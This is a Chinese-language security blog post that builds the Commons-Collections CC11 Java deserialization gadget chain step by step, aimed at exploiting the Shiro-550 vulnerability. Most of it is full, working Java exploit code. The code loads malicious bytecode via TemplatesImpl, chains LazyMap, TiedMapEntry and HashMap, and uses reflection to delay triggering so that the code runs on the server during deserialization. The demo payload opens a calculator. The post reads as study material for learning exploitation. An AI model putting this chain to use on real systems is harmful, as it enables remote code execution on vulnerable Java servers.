avatar

cindahy

A text-focused Halo theme

  • 首页
  • 文章分类
  • 项目
  • 关于
Home Java反序列化Commons-Collections篇-CC11链
文章

Java反序列化Commons-Collections篇-CC11链

Posted 2025-09-18 Updated 2025-09- 18
By Administrator
32~42 min read

前言

CC11链=CC2+CC6

这条链子的主要作用是为了可以在Commons-Collections 3.2.1 版本中使用,这条链子适用于shiro-550漏洞

构建链子

找链子

首先CC2链子的后半部分利用TemplatesImpl类调用defineClass加载恶意类是可以直接照搬的

动态加载过程如图,将Calc.class传入defineClass,让它加载此恶意字节码,

注意这里的defineClass也是有局限性的,因为它只是加载恶意类,而不是执行,若需要执行,则必须先要进行newInstance实例化。

下面为在TemplatesImp类中defineClass方法的传播过程

最后终于找到了一个public的newTransformer方法,

由于在getTransletinstance方法中就已经实例化了,我们只需要保证这些方法被执行就行了。

这里为了满足一些条件判断和为空报错的问题就需要用反射的方式在参数中传入需要的值。

  • 包括 在_bytecodes传入恶意字节码

  • 将_name改为非空

  • 将_tfactory初始化

最后得到的exp为

TemplatesImpl templates=new TemplatesImpl();

Class c=templates.getClass();
Field tfactory =c.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());

Field name=c.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"a");

Field bytecode=c.getDeclaredField("_bytecodes");
bytecode.setAccessible(true);
byte[] eval= Files.readAllBytes(Paths.get("D://Download//cc1//target//classes//org//example//Calc.class"));
byte[][] code={eval};
bytecode.set(templates,code);

templates.newTransformer();

成功弹出计算器

继续往后构造,目的是执行templates.newTransformer();

因为InvokerTransformer方法的transform中调用了invoke,那么可以借此触发此函数

这里的ChainedTransformer能把数组中的所有参数都进行transform

这里的transform返回原来的值

所以构造

Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null,null)
        };

ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
chainedTransformer.transform("1");

成功弹出计算器

继续往下找,找到谁调用了transform函数

在LazyMap类中看到了这个,并且Map类也是个相当常见的类,将chainedTransformer传入LazyMap的factory,一路跟着构造的方法。

那么就是

Map decoratemap=LazyMap.decorate(hashMap,chainedTransformer);

现在的目的是调用decoratemap的get方法

所以再这里的构造为

        TiedMapEntry tiedMapEntry=new TiedMapEntry(decoratemap,"key");
        tiedMapEntry.getValue();

到目前为止完整的链子


public class CC11 {
    public  static void main(String[]args) throws  Exception{
        TemplatesImpl templates=new TemplatesImpl();

        Class c=templates.getClass();
        Field tfactory =c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        Field name=c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field bytecode=c.getDeclaredField("_bytecodes");
        bytecode.setAccessible(true);
        byte[] eval= Files.readAllBytes(Paths.get("D://Download//cc1//target//classes//org//example//Calc.class"));
        byte[][] code={eval};
        bytecode.set(templates,code);

        //templates.newTransformer();
        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null,null)
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
  //      chainedTransformer.transform("1");
        HashMap<Object,Object> hashMap=new HashMap<>();

        Map decoratemap=LazyMap.decorate(hashMap,chainedTransformer);

        TiedMapEntry tiedMapEntry=new TiedMapEntry(decoratemap,"key");
        tiedMapEntry.getValue();


    }
}

成功弹出计算器

由于反序列的入口类都是在反序列化的时候会自动执行的readObject方法,所以我们最终的目的是这个方法,继续往下找

与入口类结合的整条链子

找到TiedMapEntry的getValue方法,

在HashMap中的方法

这就是很经典的一条反序列化入口了,一般看到hashCode都是

xxx.readObject()
	HashMap.put() --自动调用-->   HashMap.hash()
		后续利用链.hashCode()

所以这里这样构造

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC11 {
    public  static void main(String[]args) throws  Exception{
        TemplatesImpl templates=new TemplatesImpl();

        Class c=templates.getClass();
        Field tfactory =c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        Field name=c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field bytecode=c.getDeclaredField("_bytecodes");
        bytecode.setAccessible(true);
        byte[] eval= Files.readAllBytes(Paths.get("D://Download//cc1//target//classes//org//example//Calc.class"));
        byte[][] code={eval};
        bytecode.set(templates,code);

        //templates.newTransformer();
        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null,null)
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
  //      chainedTransformer.transform("1");
        HashMap<Object,Object> hashMap=new HashMap<>();

        Map decoratemap=LazyMap.decorate(hashMap,chainedTransformer);

        TiedMapEntry tiedMapEntry=new TiedMapEntry(decoratemap,"key");
        //tiedMapEntry.getValue();

        HashMap hashMap1=new HashMap<>();
        hashMap1.put(tiedMapEntry,"value");

        serialize(hashMap1);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;


}
}

但是这里打断点调试会发现,计算器提前弹出了,打断点会发现hashMap1.put(tiedMapEntry,"value");的时候计算器就提前弹出了,这里是因为hashmap的put方法就会间接进入到链子里面。

这里必须要让恶意类延迟到反序列化中执行,因为如果提前被触发就是在客户端,必须让恶意代码在服务端被执行才能达到恶意目的

如何让恶意类延迟到反序列化的时候再执行呢,就是先传入一个无用的参数,再在后面通过反射的方式将参数改变

构造最后的链子

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC11 {
    public  static void main(String[]args) throws  Exception{
        TemplatesImpl templates=new TemplatesImpl();

        Class c=templates.getClass();
        Field tfactory =c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        Field name=c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field bytecode=c.getDeclaredField("_bytecodes");
        bytecode.setAccessible(true);
        byte[] eval= Files.readAllBytes(Paths.get("D://Download//cc1//target//classes//org//example//Calc.class"));
        byte[][] code={eval};
        bytecode.set(templates,code);

        //templates.newTransformer();
        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null,null)
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
  //      chainedTransformer.transform("1");
        HashMap<Object,Object> hashMap=new HashMap<>();

        Map decoratemap=LazyMap.decorate(hashMap,new ConstantTransformer("five"));

        TiedMapEntry tiedMapEntry=new TiedMapEntry(decoratemap,"key");
        //tiedMapEntry.getValue();

        HashMap hashMap1=new HashMap<>();
        hashMap1.put(tiedMapEntry,"value");
        decoratemap.remove("key");

        Class cl=LazyMap.class;
        Field factory=cl.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(decoratemap,chainedTransformer);

        serialize(hashMap1);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;


}
}

最终不带Transformer版本的链子

真正的CC11链子是可以不带Transformer数组的,这样,我们可以通过CC11来打Shrio-550的漏洞。

这里像CC2一样利用InvokerTransfomer调用TempalteImpl.newTransformer()

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC11 {
    public  static void main(String[]args) throws  Exception{
        TemplatesImpl templates=new TemplatesImpl();

        byte[] eval= Files.readAllBytes(Paths.get("D://Download//cc1//target//classes//org//example//Calc.class"));
        byte[][] code={eval};
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
        setFieldValue(templates,"_name","a");
        setFieldValue(templates,"_bytecodes",code);
        InvokerTransformer invokerTransformer=new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{});

        HashMap<Object,Object> hashMap=new HashMap<>();

        Map decoratemap=LazyMap.decorate(hashMap,new ConstantTransformer("five"));

        TiedMapEntry tiedMapEntry=new TiedMapEntry(decoratemap,templates);

        HashMap hashMap1=new HashMap<>();
        hashMap1.put(tiedMapEntry,"value");
        decoratemap.remove(templates);

        setFieldValue(decoratemap,"factory",invokerTransformer);

        serialize(hashMap1);
        unserialize("ser.bin");
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;


    }
}

总结

java反序列化
java反序列化
License:  CC BY 4.0
Share

Further Reading

Oct 9, 2025

Java反序列化-RMI的几种攻击方式

RMI的基本攻击方式 RMI Client打RMI Registry RMI Client打RMI Server RMI Client 打RMI Registry 与注册中心的交互主要是这句话 Naming.bind("rmi://127.0.0.1:1099/sayHello", new Remo

Sep 28, 2025

Java反序列化-RMI流程分析

概述 官方文档:https://docs.oracle.com/javase/tutorial/rmi/overview.html RMI应用程序通常由两个独立的程序组成,一个服务器和一个客户端。服务端通过绑定这个远程对象类,它可以封装网络操作。客户端层面上只需要传递一个名字,还有地址。RMI提供了

Sep 21, 2025

Shiro反序列化漏洞-Shiro550

环境搭建 tomcat8.5.81 JDK1.7下载地址 https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html 下载shrio对应的war包 https://github.com/jas502n/

OLDER

Java反序列化Commons-Collections篇-CC7链

NEWER

Java反序列化-CommonsBeanUtilsa1l链分析

Recently Updated

  • 常见安全产品整理(防火墙,WAF,EDR)
  • ELK从入门到实践
  • bp+mumu模拟器app抓包
  • xray漏扫工具
  • Java反序列化-RMI的几种攻击方式

Trending Tags

安全运营 文件上传 php反序列化 xss csrf ssrf xxe sql php 白帽子讲web安全

Contents

©2025 cindahy. Some rights reserved.

Using the Halo theme Chirpy